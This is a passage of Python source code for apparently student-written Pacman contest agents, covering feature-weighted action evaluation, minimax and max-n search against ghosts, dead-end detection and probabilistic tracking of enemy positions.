cell) surrend to one position \n def detectSurroundWallWithFilled(self, gameState, pos, filledPos):\n wallNum = 0\n if gameState.hasWall(pos[0] + 1, pos[1]) or (pos[0] + 1, pos[1]) in filledPos:\n wallNum += 1\n if gameState.hasWall(pos[0] - 1, pos[1]) or (pos[0] - 1, pos[1]) in filledPos:\n wallNum += 1\n if gameState.hasWall(pos[0], pos[1] + 1) or (pos[0], pos[1] + 1) in filledPos:\n wallNum += 1\n if gameState.hasWall(pos[0], pos[1] - 1) or (pos[0], pos[1] - 1) in filledPos:\n wallNum += 1\n return wallNum\n\n # Find all dead end positions in the maze\n def findDeadEnd(self, gameState):\n deadEndPos = set()\n posQueue = util.Queue()\n for x in range(1, self.width-1):\n #print(\"x\", x, self.height-1)\n for y in range(1, self.height-1):\n if not gameState.hasWall(x,y) and self.detectSurroundWall(gameState, (x,y)) == 3:\n \n deadEndPos.add((x,y))\n posQueue.push((x,y))\n while not posQueue.isEmpty():\n curPos = posQueue.pop()\n #deadEndPos.add(curPos)\n neighborPoses = [(curPos[0]+1, curPos[1]),(curPos[0]-1, curPos[1]),(curPos[0], curPos[1]+1),(curPos[0], curPos[1]-1)]\n #neighborPoses = [(curPos[0]+i, curPos[1]+j) for i in [-1, 0, 1] for j in [-1, 0, 1] if not gameState.hasWall(curPos[0]+i, curPos[1]+j)]\n for neighborPos in neighborPoses:\n\n if neighborPos not in deadEndPos and not gameState.hasWall(neighborPos[0],neighborPos[1]):\n if self.detectSurroundWallWithFilled(gameState, neighborPos, deadEndPos) >= 3:\n deadEndPos.add(neighborPos)\n posQueue.push(neighborPos)\n self.deadEndPoses = deadEndPos\n\n\n\n \n\n\n \n \n\n \n\n \n \n\n \n\n\n \n\n\n\n\n\n \n \n def checkStateSafeAtHome(self, gameState):\n enemy = self.getEnemy(gameState)\n enemyPacman = enemy['Pacman']\n agentPos = gameState.getAgentPosition(self.index)\n nearbyEnermy = []\n\n for index, pos in enemyPacman:\n dist = self.getMazeDistance(agentPos, pos)\n if dist <= 5:\n nearbyEnermy.append((index, pos))\n\n if not nearbyEnermy:\n return None\n return nearbyEnermy\n\n \n def evaluateGoHome(self, gameState, action):\n features = self.getFeaturesGoHome(gameState, action)\n weights = self.getWeightsGoHome(gameState, action)\n return features * weights\n\n def getFeaturesGoHome(self, gameState, action):\n features = util.Counter()\n myPos = gameState.getAgentPosition(self.index)\n ghsPosition = self.checkStateSafe(gameState)\n successor = gameState.generateSuccessor(self.index, action)\n nextPos = successor.getAgentState(self.index).getPosition()\n if ghsPosition:\n for _, pos in ghsPosition:\n features['distToGhost'] += self.getMazeDistance(pos, nextPos)\n else: \n features['distToGhost'] = 0\n if self.distToHome[myPos]:\n features['homeDist'] = -1*self.distToHome[myPos][0]\n else:\n features['homeDist'] = 0\n\n # is Pacman\n features['isPacman'] = successor.getAgentState(self.index).isPacman\n\n return features\n\n def getWeightsGoHome(self,gameState, action):\n return {'homeDist': 50, 'distToGhost': 10, 'isPacman': -80}\n\n def reachedImpasse(self, gameState, myPos):\n inImpasseRegion = bool(myPos in self.frontierPoints)\n #print('=== 320 ===', friendPos, myPos, gstPos)\n gstPos = self.checkStateSafe(gameState)\n return inImpasseRegion and gstPos\n\n def evaluateImpasse(self, gameState, action):\n features = self.getFeaturesImpasse(gameState, action)\n weights = self.getWeightsImpasse(gameState, action)\n #print(action, features, features*weights)\n return features * weights\n\n def getFeaturesImpasse(self, gameState, action):\n features = util.Counter()\n successor = self.getSuccessor(gameState, action)\n foodList = self.getFood(successor).asList()\n nextPos = successor.getAgentState(self.index).getPosition()\n\n\n # Compute distance to the nearest ghost free (i.e. least belief in ghost position) enemy territory\n features['distToGstFreeEnemyAreaY'] = self.getDistToGstFreeEnemyAreaY(gameState, nextPos)\n features['distToGstFreeEnemyAreaX'] = self.getDistToGstFreeEnemyAreaX(gameState, nextPos)\n\n # Away from ghost\n ghsPosition = self.checkStateSafe(gameState)\n if ghsPosition:\n for enemyIdx, pos in ghsPosition:\n features['distToGhost'] += self.getMazeDistance(pos, nextPos)\n \n features['distToGhost'] += self.getApproxGhostDistance(nextPos)\n \n # to avoid the situation that the destination of the action has a ghost, nextpos will be starting point.\n if nextPos == self.start:\n features['distToGhost'] = 0\n \n # penalise stop\n if action == Directions.STOP: features['stop'] = 1\n\n # penalise reverse\n rev = Directions.REVERSE[gameState.getAgentState(self.index).configuration.direction]\n if action == rev: features['reverse'] = 1\n\n # invader\n enemies = [successor.getAgentState(i) for i in self.getOpponents(successor)]\n invaders = [a for a in enemies if a.isPacman and a.getPosition() != None]\n if len(invaders) > 0:\n dists = [self.getMazeDistance(nextPos, a.getPosition()) for a in invaders]\n features['invaderDistance'] = min(dists)\n\n # invader number\n features['numInvaders'] = len(invaders)\n\n # isPacman\n features['isPacman'] = successor.getAgentState(self.index).isPacman\n\n # is eaten\n if ghsPosition:\n if self.mayBeEaten(nextPos, ghsPosition) or nextPos == self.start:\n features['isEaten'] = 1\n else:\n features['isEaten'] = 0\n return features\n\n def getDistToGstFreeEnemyAreaY(self, gameState, nextPos):\n \"\"\"\n Maximise the abs of y axis distance to the belief of ghost position\n \"\"\"\n dist = 0\n global belief\n posList = list(belief[self.enemies[0]].items()) + list(belief[self.enemies[1]].items())\n for pos, prob in posList:\n if pos in self.enemyCells:\n\n dist += prob*(abs(pos[1] - nextPos[1])) # maximise y distance\n return -1*dist\n def getDistToGstFreeEnemyAreaX(self, gameState, nextPos):\n \"\"\"\n Maximise the abs of y axis distance to the belief of ghost position\n \"\"\"\n dist = 0\n global belief\n posList = list(belief[self.enemies[0]].items()) + list(belief[self.enemies[1]].items())\n for pos, prob in posList:\n if pos in self.enemyCells:\n\n dist += prob*(abs(pos[0] - nextPos[0])) # maximise y distance\n return -1*dist\n\n\n def minimax(self, gameState, playerIndex, enermyIndex, isPacman = True):\n if len(enermyIndex) == 1:\n allIndexes = [self.index, enermyIndex[0]]\n depth = self.miniMaxDepth\n #print(\"+++ 1 Enermy MINIMAX BEGIN+++551\")\n _, toAct = self.max2(gameState, depth, self.index, allIndexes, isPacman)\n #print(\"+++1 Enermy MINIMAX RESULT 553\", toAct)\n elif len(enermyIndex) == 2:\n #actions = gameState.getLegalActions(self.index)\n allIndexes = [playerIndex] + enermyIndex\n depth = self.miniMaxDepth2\n #print(\"+++ 2 Enermy MINIMAX BEGIN+++558\")\n _, toAct = self.maxn(gameState, depth, playerIndex, allIndexes, isPacman)\n #toAct = random.choice(actions)\n #print(\"HAVNT IMPLEMENTED\")\n #print(\"+++2 Enermy MINIMAX RESULT 562\", toAct)\n return toAct\n\n def getEvaluation(self, gameState, allIndex):\n #print(len(allIndex))\n if len(allIndex) == 2:\n myPos = gameState.getAgentPosition(allIndex[0])\n enermyPos = gameState.getAgentPosition(allIndex[1])\n value = self.getMazeDistance(myPos, enermyPos)\n if myPos == self.start:\n value -= 200\n return value\n else:\n myPos = gameState.getAgentPosition(allIndex[0])\n enermyPos1 = gameState.getAgentPosition(allIndex[1])\n enermyPos2 = gameState.getAgentPosition(allIndex[2])\n distToEnermy1 = self.getMazeDistance(myPos, enermyPos1)\n distToEnermy2 = self.getMazeDistance(myPos, enermyPos2)\n minDistToEnermy = min(distToEnermy1, distToEnermy2)\n\n #print('=== 239 === ', myPos,enermyPos)\n return [(minDistToEnermy, -distToEnermy1, -distToEnermy2)]\n \n\n def getApproxGhostDistance(self, nextPos):\n\n dist = 0\n global belief\n posList = list(belief[self.enemies[0]].items()) + list(belief[self.enemies[1]].items())\n for pos in posList:\n\n if pos in self.enemyCells:\n dist += belief*self.getMazeDistance(pos, nextPos)\n return dist\n\n def updateBelief(self, position, idx):\n alreadyExistedPositions = belief[idx].keys()\n #print('===408 ===', alreadyExistedPositions)\n if position in alreadyExistedPositions or (not alreadyExistedPositions):\n possiblePositions = [(position[0]+i, position[1]+j) for i in [-1, 0, 1] for j in [-1, 0, 1] if (position[0]+i, position[1]+j) in self.legalPositions]\n for pos in possiblePositions:\n belief[idx][pos] += 1/9\n #print('===413 ===', alreadyExistedPositions)\n belief[idx][position] += 1/9\n else:\n belief[idx] = util.Counter() # if out of threat, clean our belief\n\n def getDistToFriend(self, friendPos, myPos):\n favoredY = self.favoredY\n friendDist = self.getMazeDistance(myPos, friendPos)\n if friendDist <= 4:\n return friendDist + favoredY\n return favoredY\n\n def mayBeEaten(self, nextPos, gstPos):\n beEaten = 0\n for _, pos in gstPos:\n gstNextPos = [(pos[0]+i, pos[1]+j) for i in [-1, 0, 1] for j in [-1, 0, 1]]\n if nextPos in gstNextPos:\n beEaten = 1\n return beEaten\n\n def getWeightsImpasse(self, gameState, action):\n return {'distToGstFreeEnemyAreaY': -30, 'distToGstFreeEnemyAreaX': -10, 'distToGhost': 40,\\\n 'stop': -12, 'reverse': -5, 'invaderDistance': -6, \\\n 'isPacman': -3, 'isEaten': -80}\n\n\n def max2(self, gameState, depth, playerIndex, allGameIndexes, isPacman):\n if depth == 0 or gameState.getLegalActions(playerIndex) == None:\n return (self.getEvaluation(gameState, allGameIndexes), None)\n else:\n #bestActionValue = -9999\n \n actions = gameState.getLegalActions(playerIndex)\n #value = util.Counter()\n actionValues = []\n applicableActions = []\n myPosList = []\n for action in actions:\n # Avoid return \"STOP\" in the \n #if (depth == self.miniMaxDepth and action!= \"STOP\") or depth!= self.miniMaxDepth:\n if action!= \"Stop\":\n successor = gameState.generateSuccessor(playerIndex, action)\n enermyIndex = allGameIndexes[1]\n actionValue,a = self.min2(successor, depth-1,enermyIndex, allGameIndexes, isPacman)\n myPos = successor.getAgentPosition(playerIndex)\n myPosList.append(myPos)\n #print(\"352++++max \",depth-1, actionValue, action, a)\n actionValues.append(actionValue)\n applicableActions.append(action)\n \n # when the final action (depth = self.minimaxDepth) list is empty, return 'STOP'.\n if len(applicableActions) == 0:\n return 0, 'Stop'\n\n maxValue = max(actionValues)\n bestActions = [a for a, v, p in zip(applicableActions, actionValues,myPosList) if v == maxValue]\n bestActionsPos = [p for a, v, p in zip(applicableActions, actionValues,myPosList) if v == maxValue]\n\n if depth!= self.miniMaxDepth:\n return maxValue, random.choice(bestActions)\n\n # select next action based on features (try to avoid go to the dead end)\n if depth == self.miniMaxDepth:\n #print(\"664 MINIMAX best actions\",bestActions,maxValue)\n selectedActions = self.selectMiniMaxAction(bestActions, bestActionsPos, gameState, isPacman)\n return 0, random.choice(selectedActions)\n \n # detect the number of walls surround a position.\n def detectSurroundWall(self, gameState, pos):\n wallNum = 0\n if gameState.hasWall(pos[0] + 1, pos[1]):\n wallNum += 1\n if gameState.hasWall(pos[0] - 1, pos[1]):\n wallNum += 1\n if gameState.hasWall(pos[0], pos[1] + 1):\n wallNum += 1\n if gameState.hasWall(pos[0], pos[1] - 1):\n wallNum += 1\n return wallNum\n \n\n \n # Select actions with shortest distance to home from the highest depth \n def selectMiniMaxAction(self, bestActions, bestActionsPos, gameState, isPacman):\n if isPacman:\n selectedActionsAtHome = []\n distToHomeList = []\n selectedActionsInEnermy = []\n actionsInEnermy = []\n actionsInDeadEnd = []\n actionsInDeadEndDist = []\n for bestAction, pos in zip(bestActions, bestActionsPos):\n if pos not in self.enemyCells:\n selectedActionsAtHome.append(bestAction)\n elif pos in self.enemyCells and pos not in self.deadEndPoses:\n distToHomeList.append(self.distToHome[pos][0])\n actionsInEnermy.append(bestAction)\n elif pos in self.enemyCells:\n actionsInDeadEnd.append(bestAction)\n actionsInDeadEndDist.append(self.distToHome[pos][0])\n\n \n if len(distToHomeList) !=0:\n closestToHomeDist = min(distToHomeList)\n selectedActionsInEnermy = [a for a,d in zip(actionsInEnermy, distToHomeList) if d == closestToHomeDist]\n\n selectedActions = selectedActionsAtHome + selectedActionsInEnermy\n elif len(selectedActionsAtHome):\n selectedActions = selectedActionsAtHome \n else:\n closestToHomeDistInDeadEnd = min(actionsInDeadEndDist)\n selectedActionsInEnermyDeadEnd = [a for a,d in zip(actionsInDeadEnd, actionsInDeadEndDist) if d == closestToHomeDistInDeadEnd]\n selectedActions = selectedActionsInEnermyDeadEnd\n if len(selectedActions) != 0:\n #print('407--', random.choice(selectedActions))\n return selectedActions\n #print('408--', random.choice(selectedActions))\n else:\n return bestActions\n else:\n selectedActionsAtHome = []\n distToEnemyHomeList = []\n selectedActionsInEnermy = []\n actionsAtHome = []\n actionsInDeadEnd = []\n actionsInDeadEndDist = []\n for bestAction, pos in zip(bestActions, bestActionsPos):\n if pos in self.enemyCells:\n selectedActionsInEnermy.append(bestAction)\n elif pos not in self.enemyCells and pos not in self.deadEndPoses:\n distToEnemyHomeList.append(self.computeDistToEnemyHome(pos)[0])\n actionsAtHome.append(bestAction)\n elif pos not in self.enemyCells:\n actionsInDeadEnd.append(bestAction)\n actionsInDeadEndDist.append(self.computeDistToEnemyHome(pos)[0])\n\n \n if len(distToEnemyHomeList) !=0:\n closestToEnemyHomeDist = min(distToEnemyHomeList)\n selectedActionsAtHome = [a for a,d in zip(actionsAtHome, distToEnemyHomeList) if d == closestToEnemyHomeDist]\n\n selectedActions = selectedActionsAtHome + selectedActionsInEnermy\n elif len(selectedActionsInEnermy):\n selectedActions = selectedActionsInEnermy\n else:\n closestToHomeDistInDeadEnd = min(actionsInDeadEndDist)\n selectedActionsInEnermyDeadEnd = [a for a,d in zip(actionsInDeadEnd, actionsInDeadEndDist) if d == closestToHomeDistInDeadEnd]\n selectedActions = selectedActionsInEnermyDeadEnd\n\n if len(selectedActions) != 0:\n #print('407--', random.choice(selectedActions))\n return selectedActions\n #print('408--', random.choice(selectedActions))\n else:\n return bestActions \n \n def computeDistToEnemyHome(self,pos):\n minDist = 9999\n for loc in self.frontierPointsEnemy:\n curDist = self.getMazeDistance(loc, pos)\n if curDist < minDist:\n minDist = curDist\n minDistLoc = loc\n return curDist, minDistLoc\n\n def min2(self, gameState, depth, playerIndex, allIndexes, isPacman):\n bestActionValue = 9999\n bestAction = None\n actions = gameState.getLegalActions(playerIndex)\n #value = util.Counter()\n for action in actions:\n if action!= 'Stop':\n successor = gameState.generateSuccessor(playerIndex, action)\n nextIndex = allIndexes[0]\n actionValue,a = self.max2(successor, depth-1, nextIndex, allIndexes, isPacman)\n #print(\"369++++\",depth-1, actionValue, action,a)\n if bestActionValue > actionValue:\n bestAction = action\n bestActionValue = actionValue\n return bestActionValue, bestAction\n \n \n def maxn(self, gameState, depth, playerIndex, allIndexes, isPacman):\n if depth == 0 or gameState.getLegalActions(playerIndex) == None or gameState.isOver():\n #print(depth, gameState)\n return (self.getEvaluation(gameState, allIndexes), None)\n else:\n #bestActionValue = -9999\n playerIndexInList = allIndexes.index(playerIndex)\n actions = gameState.getLegalActions(playerIndex)\n #value = util.Counter()\n actionValues = []\n applicableActions = []\n myPosList = []\n for action in actions:\n # Avoid return \"STOP\" in the \n #if (depth == self.miniMaxDepth and action!= \"STOP\") or depth!= self.miniMaxDepth:\n if action!= 'Stop':\n successor = gameState.generateSuccessor(playerIndex, action)\n playerInallIndex = (allIndexes.index(playerIndex) + 1)%len(allIndexes)\n enermyIndex = allIndexes[playerInallIndex]\n actionValue,a = self.maxn(successor, depth-1,enermyIndex, allIndexes, isPacman)\n myPos = successor.getAgentPosition(playerIndex)\n for i in range(len(actionValue)):\n actionValues.append(actionValue[i])\n applicableActions.append(action) \n myPosList.append(myPos)\n \n # when the final action (depth = self.minimaxDepth) list is empty, return 'STOP'.\n if len(applicableActions) == 0:\n return [(0,0,0)], 'Stop'\n #print('494',actionValues, [playerIndexInList])\n #print('495',[valueTuple for valueTuple in actionValues])\n maxPlayerValue = max([valueTuple[playerIndexInList] for valueTuple in actionValues])\n \n #maxValue = max(actionValues)\n bestActionValueTuples = [v for a, v, p in zip(applicableActions, actionValues,myPosList) if v[playerIndexInList] == maxPlayerValue]\n bestActions = [a for a, v, p in zip(applicableActions, actionValues,myPosList) if v[playerIndexInList] == maxPlayerValue]\n bestActionsPos = [p for a, v, p in zip(applicableActions, actionValues,myPosList) if v[playerIndexInList] == maxPlayerValue]\n #print('489 maxPlayer Value',depth, maxPlayerValue, bestActions, bestActionValueTuples,actionValues)\n if depth!= self.miniMaxDepth2:\n toAct = random.choice(bestActions)\n #print(\"831\", depth,toAct,bestActionValueTuples)\n return bestActionValueTuples, toAct\n\n # select next action based on features (try to avoid go to the dead end)\n if depth == self.miniMaxDepth2:\n #closestToHome = []\n #print(\"minimax n 812\", bestActions,bestActionValueTuples)\n selectedActions = self.selectMiniMaxAction(bestActions, bestActionsPos, gameState, isPacman)\n toAct = random.choice(selectedActions)\n\n return [(0,0,0)], toAct\n\n \n \n def isCloseToFood(self, gameState, actions):\n foodNum = len(self.getFood(gameState).asList())\n isClose = 0\n for action in actions:\n successor = gameState.generateSuccessor(self.index, action)\n foodNumNew = len(self.getFood(successor).asList())\n if foodNum > foodNumNew:\n isClose = 1\n return isClose\n\n \n \n\n def evaluatePatrol(self, gameState, action):\n \"\"\"\n Computes a linear combination of features and feature weights\n \"\"\"\n features = self.getFeaturesPatrol(gameState, action)\n weights = self.getWeightsPatrol(gameState, action)\n return features * weights\n\n def getFeaturesPatrol(self, gameState, action):\n features = util.Counter()\n successor = self.getSuccessor(gameState, action)\n nextPos = successor.getAgentPosition(self.index)\n\n myState = successor.getAgentState(self.index)\n myPos = myState.getPosition()\n\n global belief\n\n # Computes whether we're on defense (1) or offense (0)\n features['onDefense'] = 1\n if myState.isPacman: features['onDefense'] = 0\n\n # Computes distance to invaders we can see\n enemies = [successor.getAgentState(i) for i in self.getOpponents(successor)]\n invaders = [a for a in enemies if a.isPacman and a.getPosition() != None]\n features['numInvaders'] = len(invaders)\n\n patrolArea = self.frontierPoints[int(len(self.frontierPoints)/2):]\n features['distToPatrol'] = self.getDistToPatrol(myPos, patrolArea)\n\n # invader\n enemies = [successor.getAgentState(i) for i in self.getOpponents(successor)]\n invaders = [a for a in enemies if a.isPacman and a.getPosition() != None]\n if len(invaders) > 0:\n dists = [self.getMazeDistance(nextPos, a.getPosition()) for a in invaders]\n features['invaderDistance'] = min(dists)\n\n # distance to belief of where the enemies are\n distBelief = 0\n posList = self.enemyProbPos[self.enemies[0]] + self.enemyProbPos[self.enemies[1]]\n if posList:\n for pos, prob in posList:\n if pos in self.myCells:\n distBelief += self.getMazeDistance(myPos, pos)*prob\n features['distToBelief'] = distBelief\n #print('\\n====\\n patrol', posList)\n else:\n features['distToBelief'] = 0\n\n return features\n \n def getDistToPatrol(self, myPos, patrolArea):\n dists = 0\n i = 0\n for pos in patrolArea:\n dists += (self.getMazeDistance(pos, myPos))\n i += 1\n return dists/i\n\n def getWeightsPatrol(self, gameState, action):\n return {'numInvaders': -70, 'onDefense': 100, 'distToPatrol': -10, 'invaderDistance': -20, 'distToBelief': -12}\n\n def getSuccessor(self, gameState, action):\n \"\"\"\n Finds the next successor which is a grid position (location tuple).\n \"\"\"\n successor = gameState.generateSuccessor(self.index, action)\n pos = successor.getAgentState(self.index).getPosition()\n if pos != util.nearestPoint(pos):\n return successor.generateSuccessor(self.index, action)\n else:\n return successor\n\n def evaluate(self, gameState, action):\n \"\"\"\n Computes a linear combination of features and feature weights\n \"\"\"\n features = self.getFeatures(gameState, action)\n weights = self.getWeights(gameState, action)\n return features * weights\n\n def getFeatures(self, gameState, action):\n features = util.Counter()\n successor = self.getSuccessor(gameState, action)\n nextState = successor.getAgentState(self.index)\n foodList = self.getFood(successor).asList()\n nextPos = successor.getAgentState(self.index).getPosition()\n\n # score \n features['successorScore'] = -len(foodList)\n\n # Compute distance to the nearest food\n if len(foodList) > 0: # This should always be True, but better safe than sorry\n minDistance = min([self.getFoodDistance(nextPos, food, gameState) for food in foodList])\n features['distanceToFood'] = minDistance\n\n # Distance to Power Capsule\n capsule = self.getCapsules(gameState)\n if capsule:\n capsuleDist = min([self.getMazeDistance(cap, nextPos) for cap in capsule])\n features['distanceToCapsule'] = capsuleDist\n else:\n features['distanceToCapsule'] = 0 # since eaten\n\n # Away from ghost\n ghsPosition = self.checkStateSafe(gameState)\n if ghsPosition:\n for _, pos in ghsPosition:\n features['distToGhost'] += self.getMazeDistance(pos, nextPos)\n else: \n features['distToGhost'] = 0\n\n # penalise stop\n if action == Directions.STOP: features['stop'] = 1\n\n # penalise reverse\n rev = Directions.REVERSE[gameState.getAgentState(self.index).configuration.direction]\n if action == rev: features['reverse'] = 1\n\n # invader\n enemies = [successor.getAgentState(i) for i in self.getOpponents(successor)]\n invaders = [a for a in enemies if a.isPacman and a.getPosition() != None]\n if len(invaders) > 0:\n dists = [self.getMazeDistance(nextPos, a.getPosition()) for a in invaders]\n features['invaderDistance'] = min(dists)\n\n # invader number\n features['numInvaders'] = len(invaders)\n\n # isPacman\n features['isPacman'] = successor.getAgentState(self.index).isPacman\n\n # is eaten\n if ghsPosition:\n if self.mayBeEaten(nextPos, ghsPosition):\n features['isEaten'] = 1\n else:\n features['isEaten'] = 0\n\n return features\n\n def getFoodDistance(self, myPos, food, gameState):\n \"\"\"\n Force one agent to eat top food\n \"\"\"\n favoredY = self.favoredY\n return self.getMazeDistance(myPos, food) + abs(favoredY - food[1])\n\n def needToCashIn(self, myPos, nextState, maxCarry, timeLeft):\n # if we have enough pellets, attempt to cash in\n distToHome = self.distToHome[myPos]\n if distToHome:\n if nextState.numCarrying >= maxCarry or timeLeft < 2*distToHome[0]:\n return 1\n else:\n return 0\n else:\n return 0\n\n def getWeights(self, gameState, action):\n return {'successorScore': 80, 'distanceToFood': -1.8, \\\n 'distanceToCapsule': -5, 'distToGhost': 20, 'cashIn': 10, \\\n 'stop': -12, 'reverse': -2, 'invaderDistance': -1, \\\n 'numInvaders': -2, 'isPacman': 3, 'isEaten': -40}\n\n def checkStateSafe(self, gameState):\n \"\"\"\n Check if current state may be threatened by\n Returns ghost position, if none return None\n \"\"\"\n enemy = self.getEnemy(gameState)\n enemyGhost = enemy['Ghost']\n agentPos = gameState.getAgentPosition(self.index)\n nearbyGhost = []\n # check if ghost scared\n for index, pos in enemyGhost:\n dist = self.getMazeDistance(agentPos, pos)\n scared = gameState.data.agentStates[index].scaredTimer\n if dist <= 5 and scared <=2 :\n nearbyGhost.append((index, pos))\n\n if not nearbyGhost:\n return None\n return nearbyGhost\n \n def getEnemy(self, gameState): \n \"\"\"\n Returns the enemy state as a dictionary\n \"\"\"\n enemyState = {'Pacman': [], 'Ghost':[]} \n enemy = gameState.getBlueTeamIndices() if gameState.isOnRedTeam(self.index) else gameState.getRedTeamIndices()\n for index in enemy:\n eState = gameState.data.agentStates[index]\n if eState.isPacman and (eState.getPosition() != None):\n enemyState['Pacman'].append((index, eState.getPosition()))\n elif (not eState.isPacman) and (eState.getPosition() != None):\n enemyState['Ghost'].append((index, eState.getPosition()))\n return enemyState\n\n def escape(self, actions, gameState):\n \"\"\"\n Find an escape action\n \"\"\"\n vals = []\n for action in actions:\n successor = self.getSuccessor(gameState, action)\n nextPos = successor.getAgentPosition(self.index)\n features = self.getFeaturesEscape(gameState, nextPos)\n weights = self.getWeightsEscape(gameState)\n vals.append(features * weights)\n\n maxValue = max(vals)\n bestActions = [act for act, val in zip(actions, vals) if val == maxValue]\n\n return random.choice(bestActions)\n\n def getFeaturesEscape(self, gameState, nextPos):\n features = util.Counter()\n foodList = self.getFood(gameState).asList()\n myPos = gameState.getAgentPosition(self.index)\n features['successorScore'] = -len(foodList)\n ghsPosition = self.checkStateSafe(gameState)\n\n if ghsPosition:\n for _, pos in ghsPosition:\n features['distToGhost'] += self.getMazeDistance(pos, nextPos)\n else: \n features['distToGhost'] = 0\n if self.distToHome[myPos]:\n features['toHome'] = -1*self.distToHome[myPos][0]\n else:\n features['toHome'] = 0\n\n # is eaten\n if ghsPosition:\n if self.mayBeEaten(nextPos, ghsPosition):\n features['isEaten'] = 1\n else:\n features['isEaten'] = 0\n\n return features\n\n def getWeightsEscape(self, gameState):\n return {'successorScore': 2, 'distToGhost': 40, 'toHome': 10, 'isEaten': -40}\n\nclass DefensiveReflexAgent(ClassicPlanAgent):\n \"\"\"\n A defensive agent that keeps its side Pacman-free.\n With belief of where the pacman may be.\n \"\"\"\n \n def chooseAction(self, gameState):\n \"\"\"\n Picks among the actions with the highest Q(s,a).\n \"\"\"\n actions = gameState.getLegalActions(self.index)\n\n # INIT VARIABLES TO USE\n gstPos = self.checkStateSafe(gameState)\n myPos = gameState.getAgentPosition(self.index)\n Pacman = gameState.getAgentState(self.index).isPacman\n myState = gameState.getAgentState(self.index)\n defendFood = self.getFoodYouAreDefending(gameState).asList()\n foodLeft = len(self.getFood(gameState).asList())\n timeLeft = gameState.data.timeleft/4\n\n # Update our belief of enemies position\n for enemy in self.enemies:\n enemyPos = gameState.getAgentPosition(enemy)\n if enemyPos:\n newBelief = util.Counter()\n newBelief[enemyPos] = 1\n belief[enemy] = newBelief\n \n else:\n #self.randomWalk(enemy, gameState)\n #self.observedEnemy(enemy, gameState)\n prevState = self.getPreviousObservation()\n if prevState:\n prevEnemyPos = prevState.getAgentPosition(enemy)\n prevMyPos = prevState.getAgentPosition(self.index)\n \n if prevEnemyPos and (self.getMazeDistance(prevEnemyPos, prevMyPos) == 1) and (prevState.getAgentState(enemy).isPacman):\n newBelief = util.Counter()\n newBelief[gameState.getInitialAgentPosition(enemy)] = 1\n #print('enemy pacman busted')\n belief[enemy] = newBelief\n self.trackPosition[enemy] = []\n #print(' === 303 === updated belief of random walk', self.belief)\n # Get most probable position of enemy\n \n for enemy in self.enemies:\n maxProb = sorted(belief[enemy].values())[-1:]\n probablePosition = [(pos, prob) for pos, prob in belief[enemy].items() if prob in maxProb]\n self.enemyProbPos[enemy] = probablePosition\n #print('\\n=== 310 ===', enemyProbPos)\n\n\n \n # ACTION SENARIO : the enemy eat the Capsule,run away, tend to move to the enermy's side\n scared = gameState.data.agentStates[self.index].scaredTimer\n enemyPacmanPos = self.checkStateSafeAtHome(gameState)\n #print('308 scared', scared, enemyPacmanPos)\n if scared > 0 and enemyPacmanPos and not Pacman:\n enermyIndex = [tup[0] for tup in enemyPacmanPos]\n toAct = self.minimax(gameState, self.index, enermyIndex, False)\n #print('=== 1103 enermy eat cap ===', self.index, toAct, timeLeft, myPos)\n return toAct\n\n # ACTION SENARIO : when pacman and in enermy's side threatened by the ghost\n gstPos = self.checkStateSafe(gameState)\n \n if gstPos and Pacman:\n enermyIndex = [tup[0] for tup in gstPos]\n #depth = self.miniMaxDepth\n \n toAct = self.minimax(gameState,self.index, enermyIndex) \n #print('=== 1114 minimax ===', self.index, toAct, timeLeft,myPos) \n return toAct\n \n # === ABOUT TO LOSE SENARIO ===\n if len(defendFood) <= self.totalFoodNum/5:\n values = [self.evaluatePatrol(gameState, a) for a in actions]\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n bestAction = random.choice(bestActions)\n # print('=== 1123 ===', self.index, bestAction, timeLeft,myPos)\n return bestAction\n\n \n\n \n # === OFFENSIVE SENARIO ===\n if len(defendFood) > self.totalFoodNum/2 and timeLeft > 90:\n\n # CASE 1: REACHED-AN-IMPASSE SENARIO ===\n isInImpasse = self.reachedImpasse(gameState, myPos)\n if isInImpasse:\n \n values = [self.evaluateImpasse(gameState, a) for a in actions]\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n bestAction = random.choice(bestActions)\n #print('=== 1165 === impasse', self.index, bestAction, timeLeft,myPos)\n #print('\\n=== 1166 ===', enemyProbPos)\n return bestAction\n \n\n # === ABOUT-TO-WIN SENARIO ===\n if gstPos and Pacman:\n enermyIndex = [tup[0] for tup in gstPos]\n #depth = self.miniMaxDepth\n toAct = self.minimax(gameState, self.index, enermyIndex) \n #print('=== 1149 ===', self.index, toAct, timeLeft,myPos) \n return toAct\n\n if foodLeft <= 2: \n bestDist = 9999\n for action in actions:\n successor = self.getSuccessor(gameState, action)\n pos2 = successor.getAgentPosition(self.index)\n dist = self.getMazeDistance(self.start,pos2)\n if dist < bestDist:\n bestAction = action\n bestDist = dist\n #print('=== 1161 ===', self.index, bestAction, timeLeft,myPos) \n return bestAction\n\n # CASE 2: carrying enough food, go home\n goHome = self.needToCashIn(myPos, myState, self.minPelletsToCashIn, timeLeft)\n notHome = self.distToHome[myPos]\n isCloseToFood = self.isCloseToFood(gameState, actions)\n if goHome and (notHome) and (not isCloseToFood):\n dist, end = self.distToHome[myPos]\n # BFS find shortest path to home\n _, path = self.getBfsPath(gameState, end, myPos)\n toAct = path.pop(0)\n\n # check if threatened by ghost\n threatToHome = self.checkStateSafe(gameState)\n Pacman = gameState.getAgentState(self.index).isPacman\n\n # escape\n if threatToHome and Pacman:\n enermyIndex = [tup[0] for tup in gstPos]\n \n toAct = self.minimax(gameState, self.index, enermyIndex) \n #print('=== 1204 === need to cash in and threatened action', toAct) \n return toAct\n #print('=== 1205 === need to cash in and no threat action', toAct)\n return toAct\n \n\n # CASE 3: no threats and still hungry \n values = [self.evaluate(gameState, a) for a in actions]\n\n # === DEFENDIVE SENARIO ===\n else:\n values = [self.evaluateDefensive(gameState, a) for a in actions]\n\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n \n \n bestAction = random.choice(bestActions)\n #print('=== 1200 ===', self.index, bestAction, timeLeft,myPos)\n return bestAction\n\n \n\n def getWeightsImpasse(self, gameState, action):\n # Give more incentive to intercept enemy pacman\n return {'distToGstFreeEnemyAreaY': -25, 'distToGstFreeEnemyAreaX': -10, 'distToGhost': 32,\\\n 'stop': -12, 'reverse': -5, 'invaderDistance': -4, \\\n 'isPacman': -3, 'isEaten': -80}\n\n def evaluatePatrol(self, gameState, action):\n \"\"\"\n Computes a linear combination of features and feature weights\n \"\"\"\n features = self.getFeaturesPatrol(gameState, action)\n weights = self.getWeightsPatrol(gameState, action)\n return features * weights\n\n def 